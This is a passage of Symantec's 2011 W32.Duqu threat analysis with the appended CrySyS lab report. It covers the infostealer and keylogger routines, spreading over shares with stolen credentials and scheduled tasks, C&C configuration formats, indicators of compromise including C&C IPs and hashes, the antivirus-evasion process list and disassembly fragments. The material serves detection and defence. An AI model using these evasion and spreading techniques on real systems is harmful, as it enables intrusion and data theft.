If cmdfile isn’t present, a default encrypted command blob is used, stored as one of the infostealer’s resources.•
If logfile isn’t present, the log will be dumped to a random .tmp file in user’s %Temp% folder, prefixed with ~DQ •
(e.g. ~DQ7.tmp). Figure 13
Hubble image
W32.Duqu: The precursor to the next Stuxnet
Page 18Security Response
The other Infostealer’s resource is the Infostealer DLL itself, embedded in a .jpg file.
The executable simply loads the DLL inside winlogon or svchost, and executes the appropriate export:
_1 (unused), similar to _2•
_2 main•
_3 (unused), similar to _2•
_4 restart infostealer•
_5 quit infostealer•
The command blob determines what should be stolen and at which frequency.
The DLL offers nine main routines:
65h: List of running processes, account details, and domain information•
66h: Drive names and information, including those of shared drives•
68h: Take a screenshot•
69h: Network information (interfaces, routing tables, shares list, etc.)•
67h: Keylogger•
6Ah: Window enumeration•
6Bh: Share enumeration•
6Dh: File exploration on all drives, including removable drives•
6Eh: Enumerate computers on the domain through NetServerEnum•
The standard command blob (used when cmdfile is not specified) is:
65h, frequency=30 seconds•
66h, frequency=30 seconds•
68h, frequency=30 seconds•
69h, frequency=30 seconds•
67h, frequency=30 seconds•
6Ah, frequency=30 seconds•
6Bh, frequency=30 seconds•
6Dh, frequency=30 seconds•
Note: The threat only uses eight routines (6Eh is not used).
The log file contains records with the following fields:
Type •
Size •
Flags •
Timestamp •
Data•
Infostealer 2
We observed Duqu downloading this file on October 18 with MD5 92aa68425401ffedcfba4235584ad487, which
was compiled on Tuesday, August 09, 2011 at 21:37:39 PST. This file is very similar to the standalone infostealer
1 executable described previously; however, it is a DLL this time. It is also newer (August 9 vs. May 31 for the
executable) and offers less functionality than the executable. The functions offered are only seven stealing rou -
tines (nine previously).
These are:
List of running processes, plus account and domain•
List drive names and information, including shared drives•
Screenshot•
Network information (interfaces, routing tables, and shares list)•
Windows enumeration•
Share enumeration•
Share browse• W32.Duqu: The precursor to the next Stuxnet
Page 19Security Response
The following functions no longer exist:
Keylogger•
File exploration on all drives, including removable drives•
Domain’s servers enumeration (using NetServerEnum)•
Reconnaissance module
We observed Duqu downloading this file on October 18 with MD5 4c804ef67168e90da2c3da58b60c3d16,
which was compiled on Monday, October 17, 2011 at 17:07:47 PST. It is a reconnaissance module DLL used to get
system information. It obtains the following information:
Is the computer part of a domain?•
The current module name, PID, session ID, Windows folder, and %Temp% folder. •
OS version, including if it is 64-bit OS.•
Account name of the running process.•
Information on Network adapters.•
Time information, including local and system times, as well as time zone information and DST bias.•
Lifespan extender module
We observed Duqu downloading this file on October 18 with MD5 856a13fcae0407d83499fc9c3dd791ba, which
was compiled on Monday, October 17, 2011 at 16:26:09 PST. Used to increase the lifetime of the threat, it is a
small DLL that can be used to update the “daycount” field of the main configuration data block of Duqu. As previ -
ously described, Duqu checks this lifetime value, and removes itself if it falls outside the time period. The DLL
can also gather the size of files in the Windows folder (file names are caller-provided).
Replication
Network spreading
Based on forensic analysis of compromised com -
puters, we are able to understand how the attack -
ers moved laterally across the network and infect
further computers. Some of the methods used in
this case may vary from other attacked organiza -
tions as the behavior is not hard-coded into the
threat, but actively conducted by the attackers.
When Duqu first compromises a target network,
the threat contacts a C&C server. We know from
the initial analysis by CrySyS, and confirmed by
ourselves, that one of the files downloaded by
Duqu from the C&C server is a keylogger. This
keylogger enables the attacker to intercept pass -
words for the local network and any other services
accessed by the victim. Additional files down -
loaded from the C&C server allow the attacker
to survey the local network, finding additional
network servers and clients. When the attacker
has accumulated passwords and located various
computers of interest on the local network, he or
she can then begin the process of spreading Duqu
across the network.
The first step is to copy Duqu onto the target computer over a shared folder, as depicted in figure 14. The infect -
ing computer is able to authenticate to the target by using the credentials intercepted by the keylogger. The next
step is to trigger execution of that copied sample on the target computer. This is done by creating a scheduled
task on the target computer, which executes the copied version of Duqu. Figure 14
Spreading across the network
Target server
Initial infected
compute r
1. Send request to C&C server
2. Respo nse with command to begin sprea ding
3. Copy Duqu to target computer
4. Create remote schedule job
Command & Control
ServerW32.Duqu: The precursor to the next Stuxnet
Page 20Security Response
At this point Duqu is running on the target computer. The newly infected target computer does not connect back
to the C&C server to receive commands. Instead it checks its configuration file as it loads. This configuration file
instructs it to connect back to the infecting computer to receive commands, as described in the command and
contro l section.
Variants
The following section discusses the
differences seen in the minor variants
of Duqu.
CMI4432.SYS
This is functionally equivalent to JMI -
NET7.SYS except that CMI4432.SYS is
digitally signed. The signature informa -
tion is displayed in figure 15.
CMI4432.PNF
This file is a more recent variant of
netp191.pnf. The differences between
Netp191 and CMI4432.PNF are shown
in figure 16.
Further the RPC component (export 7) is removed from this variant as only a small portion of the RPC code was
being used for loading resource 302. This is the only part of the routine that remains and is not exposed through
RPC anymore. In addition, export 2, get_version, is also removed.
Figure 16
Differences between Duqu variants
Main DLL Main DLL
Mz file with
compressed data
inside.Netp191.pnf Cmi4 432.pn f
Resource 302 Resource 302 Data config info
Mz–
Loader
Threat config inf o
Mz–
Payload
Compressed DataData config info
Mz–
Loader
Threat config inf oExtracted
Mzfile
All four of these files
are the same:
•MzL oader
•MzP ayload
•DataC fg
•ThreatCf gThese files are identical except
for the compressed data.
The Mz–L oader has
no compressed data.Variant 1: Nov 4 2010 Variant 2: July 16 2011
DecompressExtract
&
Execute
Mz–
Payload Figure 15
CMI4432.SYS signature information
W32.Duqu: The precursor to the next Stuxnet
Page 21Security Response
Acknowledgements
We wish to thank CrySyS of Budapest University of Technology and Economics, who notified us of the sample,
provided their research and samples, and have continued to work with us.
Appendix
File hashes
Diagnostics
The following traces may indicate an infection of Duqu:
Unexpected connections to 206.183.111.97 or 77.241.93.160.•
The existence of the following registry entry: •
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\”CFID”
Unknown drivers in %System%\Drivers\.•
A services registry subkey with the following attributes:•
“ImagePath” matching the unknown driver found in %System%\Drivers•
“Start” = “1”•
“Type” = “1”•
“FILTER” has unknown hex data for a value•
“DisplayName”, “Description”, and “keyname” all match•
Drivers signed by unknown publishers that expire on August 2, 2012.• Table 4
Sample names and hashes
MD5File compilation
dateFile name Comment
0a566b1616c8afeef214372b1a0580c7 7/17/2011 7:12 cmi4432.pnf Encrypted DLL loaded by cmi4432.sys
0eecd17c6c215b358b7b872b74bfd800 11/3/2010 17:25 jminet7.sys Originally discovered file
3B51F48378A26F664BF26B32496BD72A adp55xx.sys Sys file
3d83b077d32c422d6c7016b5083b9fc2 10/17/2011 20:06 adpu321.sys Sys file obtained from VirusTotal
4541e850a228eb69fd0f0e924624b245 11/3/2010 17:25 cmi4432.sys Originally discovered file
4c804ef67168e90da2c3da58b60c3d16 10/18/2011 1:07 N/A Recon DLL pushed by the C&C
7A331793E65863EFA5B5DA4FD5023695 11/4/2010 16:48 iddr021.pnf main dll
856a13fcae0407d83499fc9c3dd791ba 10/18/2011 0:26 N/A “Lifetime” updater pushed by C&C
92aa68425401ffedcfba4235584ad487 8/10/2011 5:37 N/A Reduced functionality infostealer pushed by C&C
94c4ef91dfcd0c53a96fdc387f9f9c35 netp192.pnf Config file loaded by netp191.PNF
9749d38ae9b9ddd81b50aad679ee87ec 6/1/2011 3:25 keylogger.exe Originally discovered infostealer
a0a976215f619a33bf7f52e85539a513 10/17/2011 20:06 igdkmd16b.sys
a1d2a954388775513b3c7d95ab2c9067 11/3/2010 10:25 nfred965.sys
b4ac366e24204d821376653279cbad86 11/4/2010 16:48 netp191.PNF Encrypted DLL loaded by jminet7.sys
c9a31ea148232b201fe7cb7db5c75f5e 10/17/2011 20:06 nfred965.sys Sys file obtained from European organization
dccffd4d2fc6a602bea8fdc1fa613dd4 allide1.sys
e8d6b4dadb96ddb58775e6c85b10b6cc cmi4464.PNF Config file loaded by cmi4432.pnf
f60968908f03372d586e71d87fe795cd 11/3/2010 17:25 nred961.sys Sys file obtained from European organizationW32.Duqu: The precursor to the next Stuxnet
Page 22Security Response
Recent .pnf files in %Windir%\INF:•
Are either under 10K or ~200K in size•
Do not have a corresponding *.INF file•
Have no ASCII strings inside•
Unexpected scheduled tasks or job files. (These can be seen by unexpected modification time to the Tasks •
folder.)
An Event Log entry matching the following attributes:•
An EventID of 0xC0002719 or 3221235481•
Event type : 1 (Error)•
Event source : DCOM•
May have the following description: •
DCOM was unable to communicate with the computer (computer name) using any of the configured proto -
cols
RPC server with UUID {000207E3-0000-0000-C000000000000046}•
Command & Control Configuration Data
Connection Information Block – Client Table 5
Header
Size Name Value
BYTE Type 1 – server configuration block
0 – client configuration block
QWORD BitFlags Defines server protocol.
Bit 0 – HTTP, Bit 1 – Named pipe
CWSTR Path Path to save downloaded payload modules
CHAR[] Key Key for AES encryption
Table 6
Connection Information Block–Server
Size Name Value
CWSTR Name Server binding interface or name
WORD Port Listening port number
CHAR[] Key Key for AES encryption
Table 7
Client Header
Size Name Value
WORD TryCount Total number of times to retry each connection block
WORD[6] Flags Miscellaneous flags
DWORD Type Client block type
DWORD Size Size of blockW32.Duqu: The precursor to the next Stuxnet
Page 23Security Response
Table 9
Client Blocks – Type 1
Size Name Value
DWORD Flags Miscellaneous flags
WORD Port
DWORD Flags2 Miscellaneous flags
WORD Port
BYTE Method HTTP method and URL path
Bit 0 is 0 – GET, Bit 0 is 1 – POST
Bit 1 – use “/?”
Bit 2 – use “/?”
Bit 3 – use “/MULTIPART”
BYTE Proxy 0 – no proxy
1 – use proxy
2 – default
3 – retrieve
BYTE AuthenticatedProxy Use authenticated proxy
DWORD Cnt
WORD ProxyLength Length of the proxy server string
WORD ProxyUserLength Length of the proxy user string
WORD ProxyPassLength Length of the proxy password string
CWSTR ProxyAddress Proxy server address
CWSTR ProxyUser Proxy user name
CWSTR ProxyPassword Proxy password Table 8
Client Blocks – Type 0
Size Name Value
WORD Port Port number
BYTE Protocol0 – HTTP
1 – PIPE
2 - HTTPS
DWORD Flags Miscellaneous flags
CWSTR Server Server name or IP
CWSTR Pipename Pipename if applicable
CWSTR Username User name if required
CWSTR Password Password if requiredW32.Duqu: The precursor to the next Stuxnet
Page 24Security Response
Version history
Version 1.0 (October 18, 2011)
Initial publication.•
Version 1.1 (October 19, 2011)
Removed duplicate Note from Executive summary.•
Fixed minor typos.•
Version 1.2 (October 20, 2011)
Updated paper with information about latest samples.•
Replaced image in figure 3 with zoomable, vector graphic.•
Added Downloaded threats section. •
Expanded information in File hashes appendix.•
Added Version history section.•
Minor edits.•
Version 1.3 (November 1, 2011)
Added the following new sections:•
Geographic distribution •
Installation•
Peer-to-peer command and control•
Infostealer 2•
Reconnaissance module•
Lifespan extender module•
Replication•
Diagnostics•
Updated tables in File history and File hashes sections.•
Significant content updates throughout.•
Version 1.4 (November 23, 2011)
Added new Command and Control Servers section and Command & Control Configuration Data appendix.•
Updated Executive Summary, File history, Payload (.zdata DLL), Main DLL (NETP191.PNF) and Infostealer 1 •
sections with new information.
Replaced more images with zoomable, vector graphics.•
Other minor edits.• About Symantec
Symantec is a global leader in
providing security, storage and
systems management solutions to
help businesses and consumers
secure and manage their information.
Headquartered in Moutain View, Calif.,
Symantec has operations in more
than 40 countries. More information
is available at www.symantec.com.
For specific country offices and contact num -
bers, please visit our Web site. For product
information in the U.S., call
toll-free 1 (800) 745 6054.Symantec Corporation
World Headquarters
350 Ellis Street
Mountain View, CA 94043 USA
+1 (650) 527-8000
www.symantec.comCopyright © 2011 Symantec Corporation. All rights reserved.
Symantec and the Symantec logo are trademarks or registered
trademarks of Symantec Corporation or its affiliates in the
U.S. and other countries. Other names may be trademarks of
their respective owners.Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec
Corporation.
NO WARRANTY . The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the
technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical
errors. Symantec reserves the right to make changes without prior notice.Security ResponseThe following is the analysis report from the research lab that first discovered the W32.Duqu
samples.
1. Introduction
Stuxnet is the most interesting piece of malware in the last few years, analyzed by hundreds
of security experts and the story told by thousands of newspapers. The main reason behind
the significant visibility is the targeted attack against the high profile, real‐life, industrial
target, which was considered as a thought experiment before. Experts have hypothesized
about the possibility of such a sophisticated attack, but Stuxnet rang the bell for a wider
audience about the impact of cyber attacks on critical infrastructures.
Surprisingly, the technical novelty of the individual components of the Stuxnet worm is not
astonishing. What is more interesting is the way how those different parts are combined
with each other to result in a powerful targeted threat against control systems used in
nuclear facilities. In fact, Stuxnet is highly modular, and this feature allows sophisticated
attackers to build a targeted attack from various pieces of code, similar to the way
carmakers build new cars from available parts. This modularity also means a new era for
malware developers, with a new business model pointing towards distributed labor where
malware developers can work simultaneously on different parts of the system, and modules
can be sold on underground markets.
In this document, we reveal the existence of and report about a malware found in the wild
that shows striking similarities to Stuxnet, including its modular structure, injection
mechanisms, and a driver that is digitally signed with a compromised key. We named the
malware “Duqu” as it’s key logger creates temporary files with names starting with “~DQ…”.
As researchers, we are generally concerned with understanding the impact of the malware
and designing appropriate defense mechanisms. This report makes the first steps towards
this goal. We describe the results of our initial analysis of Duqu, pointing out many
similarities to Stuxnet. We must note, however, that due to the limited available time for
preparing this report, many questions and issues remain unanswered or unaddressed.
Nevertheless, we hope that our report will still be useful for other security experts who
continue the analysis of Duqu. To help follow‐up activities, we discuss open questions at the
end of this document.
As a more general impact, we expect that this report will open a new chapter in the story of
Stuxnet. Duqu is not Stuxnet, but its structure and design philosophy are very similar to
those of Stuxnet. At this point in time, we do not know more about their relationship, but we
believe that the creator of Duqu had access to the source code of Stuxnet.
1 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 2. Main components
Upon discovering the suspicious software, we performed an initial analysis, and uncovered
three main groups of components in the software: A standalone keylogger tool, the
“Jminet7” group of objects, and the “cmi4432” group of objects as shown in Figure 1.
Figure 1 – Main components and their modules.
Keylogger
Registry data
jminet7.sys
(loader)
cmi4432.sys
(loader)
netp191.pnf
(payload)
netp192.pnf
(config)
cmi4432.pnf
(payload)
nep191_
res302.dll
netp191.zdata.
mz
cmi4432_
res302.dll
cmi4432_
203627 (exe?)
(comm module)
internal DLL
(keylogger)
cmi4464.pnf
(config) Registry data
The keylogger is a standalone .exe file that was found on an infected computer. It contains
an internal encrypted DLL, which delivers the keylogging functions, whereas the main
keylogger executable injects the DLL and controls the keylogging (screen logging, etc.)
process.
2 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. The jminet7 group of objects is working as follows: In the registry , a service is defined that
loads the jminet7.sys driver during the Windows bootup process. This kernel driver then
loads configuration data from itself and from the registry, and injects the netp191.pnf DLL
payload into a system process. Finally, some configuration data is stored in the netp192.pnf
encrypted configuration file.
The cmi4432 group of objects exhibits the same behavior: In the registry , a service is defined
that loads the cmi4432.sys driver during the Windows bootup process. This kernel driver
then loads configuration data from itself and from the registry, and injects the cmi4432.pnf
DLL payload into a system process. Finally, some configuration data is stored in the
cmi4464.pnf encrypted configuration file.
The jminet7 and the cmi4432 groups are very similar; they only differ in their payload. The
difference is tens of kilobytes in size. Also, the cmi4432.sys driver is signed and therefore can
be used e.g. on Windows 7 computers. It is not yet fully known if the two groups are
designed for different computer types or they can be used simultaneously. It is possible that
the rootkit (jminet7 or cmi4432) provides functionality to install and start the keylogger.
The similarities to the Stuxnet malware group start to show up first at this very abstract
module level. In case of Stuxnet, a service is defined in the registry that loads the mrxcls.sys
driver during the Windows bootup process. This kernel driver then loads configuration data
from itself (encrypted in the .sys file) and from the registry; and injects (among others) the
oem7a.pnf DLL payload into a system process. Finally, some configuration data is stored in
the mdmcpq3dd.pnf encrypted configuration file. This initial similarity motivated us to
perform a thorough analysis of the malware code. Our analysis uncovered similarities that
show a close relationship between the two malware groups.
We emphasize that there were only two known cases so far in which a malware used a
kernel driver with a valid digital signature: Stuxnet’s mrxcls.sys was signed by the key of
RealTek , and after the revocation of RealTek’s certificate, a new version contained the
signature of JMicron . Now, this list has a new member: cmi4432.sys contains a valid digital
signature of the Taiwanese manufacturer XXXXX.
3 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
2.1. Comparison of Stuxnet and Duqu at a glance
Feature Stuxnet Duqu
Modular malware 9 9
Kernel driver based rootkit 9 9 very similar
Valid digital signature on driver Realtek, JMicron XXXXX
Injection based on A/V list 9 9 seems based on Stux.
Imports based on checksum 9 9 different alg.
3 Config files, all encrypted, etc. 9 9 almost the same
Keylogger module ? 9
PLC functionality 9 8 (different goal)
Infection through local shares 9 No proof, but seems so
Exploits 9 ?
0‐day exploits 9 ?
DLL injection to system processes 9 9
DLL with modules as resources 9(many) 9 (one)
RPC communication 9 9
RPC control in LAN 9 ?
RPC Based C&C 9 ?
Port 80/443, TLS based C&C ? 9
Special “magic” keys, e.g. 790522, AE9 9 lots of similar
Virtual file based access to modules 9 9
Usage of LZO lib ? 9 multiple
Visual C++ payload 9 9
UPX compressed payload, 9 9
Careful error handling 9 9
Deactivation timer 9 9
Initial Delay ? Some 9 15 mins
Configurable starting in safe mode/dbg 9 9 (exactly same mech.)
Table 1 – Comparing Duqu and Stuxnet at the first glance
4 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Feature oam7a.pnf (Stuxnet) netp191.pnf (Duqu)
Packer UPX UPX
Size 1233920 bytes 384512 bytes
Exported
functions # 21 8
ntdll.dll hooks ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZwQuerySection ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZwQuerySection
Resources 13
(201, 202, 203,205, 208, 209, 210,
220, 221,222, 240,241,242, 250) 1
(302)
Table 2 – Similarities and differences between the two main dlls
Table 1 and Table 2 compare the features of Stuxnet and Duqu. From the comparison, the
strong similarity between the threats becomes apparent. When we dive into the details of
the codes, we even see that both malwares hook the same ntddl.dll functions. Furthermore,
the sections of the two dlls are also very similar as Stuxnet contains only one extra section
called .xdata (Figure 3), but its characteristics are the same as the .rdata section of Duqu
(Figure 2).
Figure 2 – The sections of Duqu’s netp191 dll
5 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Figure 3 – The sections of Stuxnet’s oem7a dll
There are also differences between the two codes. The main dll of Stuxnet (oam7a.pnf)
contains 21 exported functions (with dedicated roles), but netp191.pnf has only 8 exported
functions. The smaller number of functions is justified by the fact that Duqu does not contain
the power plant specific functionalities that Stuxnet does. However, the rest of this report
demonstrates that Duqu uses the mechanisms of Stuxnet via these functions.
6 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
2.2. Comparison of Duqu’s two main group of objects
netp191.zdata.mz Compressed file (dll) in
unknown format ??? (likely res302+comm.
module)
cmi4432.sys Kernel driver, loader of other
components
cmi4432.pnf UPX Injected DLL payload
cmi4432_res302.dll
(offset 203627) MS VC++ Private Version 1
[Overlay] Most likely, loader for the
comm. module
cmi4432_
203627.dll Communication module File Compiler/Packer Description
jminet7.sys Kernel driver, loader of other
components
nep191.pnf UPX Injected DLL payload
nep191_res302.dll
(offset 175192) MS VC++ Private Version 1
[Overlay] Internal part, ???
Table 3 – Comparing the two main group of objects
Table 3 summarizes a few pieces of information about the two main groups of objects we
identified in Duqu.
7 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
2.3. PE file dates
File Date
CMI4432.PNF 17/07/2011 06:12:41
cmi4432_res302.dll 21/12/2010 08:41:03
cmi4432_203627.dll 21/12/2010 08:41:29
netp191.PNF 04/11/2010 16:48:28
nep191_res302.dll 21/12/2010 08:41:03
Keylogger.exe 01/06/2011 02:25:18
Keylogger internal DLL 01/06/2011 02:25:16
Table 4 – Comparing dates of Duqu’s PE files
Table 4 shows the dates of Duqu’s each PE file.
2.4. Directory listing and hashes
The size, date and SHA1 sum of Duqu’s PE files are shown below.
192512 Sep 9 14.48 cmi4432.PNF
29568 Sep 9 15.20 cmi4432.sys
6750 Sep 9 14.48 cmi4464.PNF
24960 2008 Apr 14 jminet7.sys
85504 Aug 23 06.44 keylogger.ex
232448 2009 Feb 10 netp191.PNF
6750 2009 Feb 10 netp192.PNF
Sample 1 – File size, date and name – Directory listing of samples
192f3f7c40fa3aaa4978ebd312d96447e881a473 *cmi4432.PNF
588476196941262b93257fd89dd650ae97736d4d *cmi4432.sys
f8f116901ede1ef59c05517381a3e55496b66485 *cmi4464.PNF
d17c6a9ed7299a8a55cd962bdb8a5a974d0cb660 *jminet7.sys
723c71bd7a6c1a02fa6df337c926410d0219103a *keylogger.ex
8 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 3ef572cd2b3886e92d1883e53d7c8f7c1c89a4b4 *netp191.PNF
c4e51498693cebf6d0cf22105f30bc104370b583 *netp192.PNF
Sample 2 – sha1sum results for the samples
9 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
3. Injection mechanism
The registry information for Duqu’s jminet7.sys in unencrypted form is presented below:
0000000000: 00 00 00 00 01 00 00 00 │ 10 BB 00 00 01 00 03 00 ☺ ►» ☺ ♥
0000000010: 82 06 24 AE 1A 00 00 00 │ 73 00 65 00 72 00 76 00 ' ♠$R→ s e r v
0000000020: 69 00 63 00 65 00 73 00 │ 2E 00 65 00 78 00 65 00 i c e s . e x e
0000000030: 00 00 38 00 00 00 5C 00 │ 53 00 79 00 73 00 74 00 8 \ S y s t
0000000040: 65 00 6D 00 52 00 6F 00 │ 6F 00 74 00 5C 00 69 00 e m R o o t \ i
0000000050: 6E 00 66 00 5C 00 6E 00 │ 65 00 74 00 70 00 31 00 n f \ n e t p 1
0000000060: 39 00 31 00 2E 00 50 00 │ 4E 00 46 00 00 00 D2 9 1 . P N F Ň
Sample 3 – decrypted registry data for Duqu’s jminet7.sys
Knowing the operation of Stuxnet from previous analyses, visual inspection of the code hints
to the injection of “inf/netp191.PNF” into “services.exe”. Later, we will show that it also
commands that the encryption key of “0xAE240682” (offset 0x10) is used. The byte
sequence “1A 00 00 00” that follows the encryption key can also be found in the Stuxnet
registry. The only difference is that in Stuxnet the export that should be called is between
the key and the “1A 00 00 00” string, here it is before “01 00 03 00”. So after injection,
Export 1 should be called by the driver. The case of cmi4432.sys is the same, it is injected
into “services.exe” and then Export 1 is called.
4. Injection target
Duqu injection target selection is very similar to the mechanism of Stuxnet. For trusted
processes both look up a list of known antivirus products. In Duqu, this list is stored in 0xb3
0x1f XOR encrypted 0‐terminated strings. In the Resource 302 part of the cmi4432 payload
DLL the list is the following:
%A\Kaspersky Lab\AVP%v\Bases\*.*c
Mcshield.exe
SOFTWARE\KasperskyLab\protected\AVP80\environment
SOFTWARE\KasperskyLab\protected\AVP11\environment
SOFTWARE\KasperskyLab\protected\AVP10\environment
SOFTWARE\KasperskyLab\protected\AVP9\environment
SOFTWARE\KasperskyLab\protected\AVP8\environment
SOFTWARE\KasperskyLab\protected\AVP7\environment
SOFTWARE\kasperskylab\avp7\environment
SOFTWARE\kasperskylab\avp6\environment
ProductRoot
avp.exe
%C\McAfee\Engine\*.dat
SOFTWARE\McAfee\VSCore
szInstallDir32
10 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. avguard.exe
bdagent.exe
UmxCfg.exe
fsdfwd.exe
%C\Symantec Shared\VirusDefs\binhub\*.dat
rtvscan.exe
ccSvcHst.exe
ekrn.exe
%A\ESET\ESET Smart Security\Updfiles\*.nup
SOFTWARE\TrendMicro\NSC\TmProxy
InstallPath
tmproxy.exe
SOFTWARE\Rising\RIS
SOFTWARE\Rising\RAV
RavMonD.exe
Sample 4 – Duqu’s antivirus list (trusted processes) from cmi4432 res302 DLL
Basically, the list above is almost identical to the one in Stuxnet (even uses the same
ordering), the only difference is the addition of Rising Antivirus.
The outer part, cmi4432.dll contains some addition this list:
%A\Kaspersky Lab\AVP%v\Bases\*.*c
Mcshield.exe
SOFTWARE\KasperskyLab\protected\AVP80\environment
SOFTWARE\KasperskyLab\protected\AVP11\environment
SOFTWARE\KasperskyLab\protected\AVP10\environment
SOFTWARE\KasperskyLab\protected\AVP9\environment
SOFTWARE\KasperskyLab\protected\AVP8\environment
SOFTWARE\KasperskyLab\protected\AVP7\environment
SOFTWARE\kasperskylab\avp7\environment
SOFTWARE\kasperskylab\avp6\environment
ProductRoot
avp.exe
%C\McAfee\Engine\*.dat
SOFTWARE\McAfee\VSCore
szInstallDir32
avguard.exe
bdagent.exe
UmxCfg.exe
fsdfwd.exe
%C\Symantec Shared\VirusDefs\binhub\*.dat
rtvscan.exe
ccSvcHst.exe
ekrn.exe
%A\ESET\ESET Smart Security\Updfiles\*.nup
SOFTWARE\TrendMicro\NSC\TmProxy
InstallPath
tmproxy.exe
SOFTWARE\Rising\RIS
SOFTWARE\Rising\RAV
RavMonD.exe
360rp.exe
360sd.exe
Sample 5 – Antivirus list of cmi4432
11 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 360rp.exe and 360sd.exe is added.
For netp191.PNF (DLL), both the external and the internal DLL contains only the first list of
antivirus products without 360rp.exe and 360sd.exe. The keylogger also contains the same
list including 360rp.exe and 360sd.exe.
%SystemRoot%\system32\lsass.exe
%SystemRoot%\system32\winlogon.exe
%SystemRoot%\system32\svchost.exe
Sample 6 – possible targets ‐ in our case lsass.exe was used.
The evolution of the list items corresponds to the file dates in the MZ headers. All the
exectuables whose header the year 2011 contain 360rp.exe and 360sd.exe (the earliest
example is the keylogger.exe with date 01/06/2011 02:25:18), while earlier components do
not contain 360rp.exe and 360sd.exe.
5. Exported functions
Figure 4 and Figure 5 show the exported functions of netp191.pnf and cmi4432.pnf,
respectively. While netp191.pnf contains 8 exports, cmi4432 lacks export number _3 and _7.
Each export has a specific role with similarities to the exports of Stuxnet’s main dll.
We could not yet identify the function of each export, except exports 1, 7, and 8, which are
responsible for RPC functions. Below, we describe our findings related to RPC.
First, exports _1 and _8 of netp191.pnf are essentially the same as the first (_1) and the last
(_32) exports of Stuxnet’s oam7a.pnf. In case of Stuxnet, these exports served to infect
removable devices and started an RPC server to communicate with other instances of the
malware. The only difference was that _1 started the RPC server with wait, while _32 did not
sleep before the start of the RPC server. In case of netp191.pnf, export _1 and export_8 are
also related to RPC communication and differ only in a few bits.
Figure 4 – The exports of netp191.pnf
12 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Figure 5 – The exports of cmi4432.pnf
Export _7 of netp191.pnf is almost the same as the RPC server export _27 in Stuxnet. Thus,
we can assert that Duqu might have the same functionality to update itself from another
Duqu instance or from the C&C server. The main similarities between the two RPC server
initializations are highlighted in Sample 7 (Duqu) and Sample 8 (Stuxnet) . Note that there is
a slight mutation between the two samples, but despite of this, the implemented
functionalities are the same.
.text:100011A3 public RPC_Server_7
.text:100011A3 RPC_Server_7 proc near ; DATA XREF: .rdata:off_1001C308o
.text:100011A3 mov eax, offset sub_1001B756
.text:100011A8 call Nothing_sub_10018C14
.text:100011AD sub esp, 10h
.text:100011B0 push ebx
.text:100011B1 push esi
.text:100011B2 push edi
.text:100011B3 mov [ebp-10h], esp
.text:100011B6 and dword ptr [ebp-4], 0
.text:100011BA lea esi, [ebp-18h]
.text:100011BD call sub_10008CBD
.text:100011C2 xor ebx, ebx
.text:100011C4 inc ebx
.text:100011C5 mov [ebp-4], bl
.text:100011C8 call sub_10008D9B
.text:100011CD call sub_1000778F
.text:100011D2 test al, al
.text:100011D4 jnz short loc_100011F2
.text:100011D6 mov [ebp-4], al
.text:100011D9 mov eax, esi
.text:100011DB push eax
.text:100011DC call each_export_calls_sub_10008CCD
.text:100011E1
.text:100011E1 loc_100011E1: ; DATA XREF: sub_1000122C+4o
.text:100011E1 xor eax, eax
.text:100011E3 mov ecx, [ebp-0Ch]
.text:100011E6 mov large fs:0, ecx
.text:100011ED pop edi
.text:100011EE pop esi
.text:100011EF pop ebx
.text:100011F0 leave
.text:100011F1 retn
.text:100011F2 ; ---------------------------------------------------------------------------
.text:100011F2
.text:100011F2 loc_100011F2: ; CODE XREF: RPC_Server_7+31j
.text:100011F2 call sub_10006C53
.text:100011F7 lea eax, [ebp-11h]
.text:100011FA push eax
.text:100011FB call sub_10001318
.text:10001200 mov eax, dword_1002A134
.text:10001205 cmp dword ptr [eax], 0
.text:10001208 jnz short loc_1000121B
.text:1000120A mov [ebp-1Ch], ebx
.text:1000120D push offset unk_1001FC18
.text:10001212 lea eax, [ebp-1Ch]
.text:10001215 push eax
.text:10001216 call Exception_Handler_sub_10013880
13 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. .text:1000121B
.text:1000121B loc_1000121B: ; CODE XREF: RPC_Server_7+65j
.text:1000121B mov eax, [eax]
.text:1000121D mov edx, [eax]
.text:1000121F mov ecx, eax
.text:10001221 call dword ptr [edx+8]
.text:10001224 push ebx ; dwExitCode
.text:10001225 push eax ; hLibModule
.text:10001226 call ds:FreeLibraryAndExitThread
.text:10001226 RPC_Server_7 endp
Sample 7 – Export function _7 in netp191.pnf
.text:10001CA2 public _27_RPCServer
.text:10001CA2 _27_RPCServer proc near ; DATA XREF: .rdata:off_10055518o
.text:10001CA2 mov eax, offset loc_10052604
.text:10001CA7 call Nothing_sub_1004AB94
.text:10001CAC sub esp, 0Ch
.text:10001CAF push ebx
.text:10001CB0 push esi
.text:10001CB1 push edi
.text:10001CB2 mov [ebp-10h], esp
.text:10001CB5 and dword ptr [ebp-4], 0
.text:10001CB9 lea esi, [ebp-18h]
.text:10001CBC call sub_1002214A
.text:10001CC1 mov byte ptr [ebp-4], 1
.text:10001CC5 call sub_10022228
.text:10001CCA push 2
.text:10001CCC push offset dword_1005CCF0
.text:10001CD1 call sub_100226BB
.text:10001CD6 pop ecx
.text:10001CD7 pop ecx
.text:10001CD8 call sub_100319D2
.text:10001CDD test al, al
.text:10001CDF jnz short loc_10001CFD
